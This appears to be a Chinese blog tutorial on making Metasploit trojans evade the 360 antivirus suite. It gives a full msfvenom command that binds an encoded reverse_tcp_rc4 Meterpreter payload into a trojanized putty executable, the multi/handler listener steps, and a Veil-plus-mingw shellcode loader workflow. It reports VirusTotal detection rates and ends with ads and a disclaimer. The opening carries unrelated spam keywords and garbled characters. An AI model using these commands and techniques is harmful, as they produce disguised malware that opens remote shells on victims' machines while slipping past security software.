足球哪个网站做的比较好,免费创建网站平台,建筑人才市场档案查询,自动的logo品牌设计0x00#xff1a;前言
随着近两年hvv和红蓝对抗以及国家对于网络安全的重视#xff0c;国内防护水平都蹭蹭上了一个台阶#xff0c;不管是内部人员的技术水平提高还是防护设备的层层部署#xff0c;均给了红队人员想要进一步行动设置了障碍。 通过weblogic的cve-2019-2725获…0x00前言
随着近两年hvv和红蓝对抗以及国家对于网络安全的重视国内防护水平都蹭蹭上了一个台阶不管是内部人员的技术水平提高还是防护设备的层层部署均给了红队人员想要进一步行动设置了障碍。 通过weblogic的cve-2019-2725获取了一个想要进一步把shell迁移到msf或者CS进行横向移动那么此时普通的马绝对会被某60秒杀的毕竟十来年的规则库积累可能连上传都上传不了。 所以此时免杀的重要性不言而喻。且免杀也是一门非常深的学问擅长逆向、精通底层的小伙伴入手免杀简直如虎添翼可以自己写加载器去加载shellcode或者直接进行加壳混淆等等。当然薄弱也没关系下面来介绍一些msf、evil等等渗透框架的免杀技巧姿势学会了也包过国内常见杀软。 0x01环境准备
本次采用的杀软是360安全卫士全家桶12.0.0.2001/2002)
win7虚拟机联网状态支持静态动态查杀、木马检测、行为检测
kali攻击机2020年03版本)msf攻击载荷使用windows/meterpreter/reverse_tcp_rc4
国际杀软查杀检测简称VT)https://www.virustotal.com/gui/
0x02msf自捆绑配合编码免杀
使用msfvenom生成木马的时候使用-x捆绑一个正常的软件类似于生成图片马将恶意攻击payload镶进软件内。然后再对木马进行编码命令如下。
msfvenom -p windows/meterpreter/reverse_tcp_rc4 LHOST172.16.143.135 LPORT4444 -e x86/shikata_ga_nai -x puttyel.exe -i 15 - f exe -o fake_puttyel.exe
实验结果能过360纯静态查杀但时隔1分钟左右会被行为检测、动态检测查杀。所以上线以后及时做进程迁移。
首先msfvenom简单介绍一下属于metasploit的生成payload模块。自15年起代替了msfpayload和msfencode功能十分强大支持多个参数进行编码。
msfvenom --list encoders查看msfvenom自带的编码器可以看到x86/shikata_ga_nai编码器是评级为x86里面唯一excellent的所以也是编码中使用最多的。 介绍一下相关参数。
-p, –payload payload 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的 -l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n, –nopsled length 为payload预先指定一个NOP滑动长度-f, –format format 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表)-e, –encoder [encoder] 指定需要使用的encoder(编码器),指定需要使用的编码如果既没用-e选项也没用-b选项则输出 payload -a, –arch architecture 指定payload的目标架构例如x86 | x64 | x86_64
–platform platform 指定payload的目标平台-s, –space length 设定有效攻击荷载的最大长度就是文件大小-b, –bad-chars list 设定规避字符集指定需要过滤的坏字符例如:不使用 \x0f、\x00; -i, –iterations count 指定payload的编码次数-c, –add-code path 指定一个附加的win32 shellcode文件-x, –template path 指定一个自定义的可执行文件作为模板,并将payload嵌入其中-k, –keep 保护模板程序的动作注入的payload作为一个新的进程运行 –payload-options 列举payload的标准选项-o, –out path 指定创建好的payload的存放位置-v, –var-name name 指定一个自定义的变量以确定输出格式
执行生成木马语句。 msf建立监听。
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp_rc4
set LHSOT 172.16.143.135set LPORT 4444
run
生成的木马文件。 执行以后360无报警msf成功上线。 获得shell后确定不是个假sessions即迁移shell到系统进程中迁移成功后哪怕木马被360行为检测查杀也不会影响。 像这种在自己靶机内测试点击第一次可以断开shell后再次点击就会被秒查杀因为被本地规则库收录此时换一个正常的exe文件进行重新捆绑即可问题不大。
接下来看一下VT查杀率36/71效果不算好但能过360阿里巴巴也出杀软了不过测试发现表现不大行果然这种安全行业还是很拼积累和底蕴的 0x03使用veilmingw-w64
veil是一个专门拿来做免杀的渗透框架
详细介绍可以去看一下官方手测
安装方法直接pull其docker最方便直接安装可能会出现各种玄学问题
镜像地址https://hub.docker.com/r/mattiasohlsson/veil/
拉取veil镜像docker pull mattiasohlsson/veil
执行evil:docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil
上述把本机的/tmp/evil-output目录映射到docker里面这样veil生成的马就在本机可以直接操作
运行成功如下veil有两个免杀模块Evasion和Ordnance我们多用Evasion来做文件免杀。
use 1即可
切换到如下的Evasion模块下执行list 可以看到41个stager 对应各个工具、语言木马模块 这里veil可以直接生成exe但会被查杀这里我们采用外部加载器去加载shellcode,也就是用veil生成shellcode然后使用mibgw-264去加载windows下的gcc)。
首先veil生成shellcode命令如下
use 1选择Evasion模块)use 7 (选择payload)set LHOST 172.16.143.135set LPORT 4444gengrate
给你的shellcode生成一个名字其实这个也就是对应着msf配合使用的。 成功生成位置在source下的msf22.c文件。 安装好mibgw-264进行编译即可生成msf66.exe。
百度找到mibgw-264这个安装包然后在其bin目录下找到gcc.exe即可使用。 生成的qwe.exe就是我们的木马文件 双击执行msf可成功上线然后进行迁移进程即可。 附上VT查杀率 11/71还算不错 网络安全学习资源分享:
给大家分享一份全套的网络安全学习资料给那些想学习 网络安全的小伙伴们一点帮助
对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。
因篇幅有限仅展示部分资料朋友们如果有需要全套《网络安全入门进阶学习资源包》需要点击下方链接即可前往获取
读者福利 | CSDN大礼包《网络安全入门进阶学习资源包》免费分享安全链接放心点击 同时每个成长路线对应的板块都有配套的视频提供 大厂面试题 视频配套资料国内外网安书籍、文档
当然除了有配套的视频同时也为大家整理了各种文档和书籍资料 所有资料共282G朋友们如果有需要全套《网络安全入门进阶学习资源包》可以扫描下方二维码或链接免费领取~
读者福利 | CSDN大礼包《网络安全入门进阶学习资源包》免费分享安全链接放心点击 特别声明
此教程为纯技术分享本教程的目的决不是为那些怀有不良动机的人提供及技术支持也不承担因为技术被滥用所产生的连带责任本教程的目的在于最大限度地唤醒大家对网络安全的重视并采取相应的安全措施从而减少由网络安全而带来的经济损失。
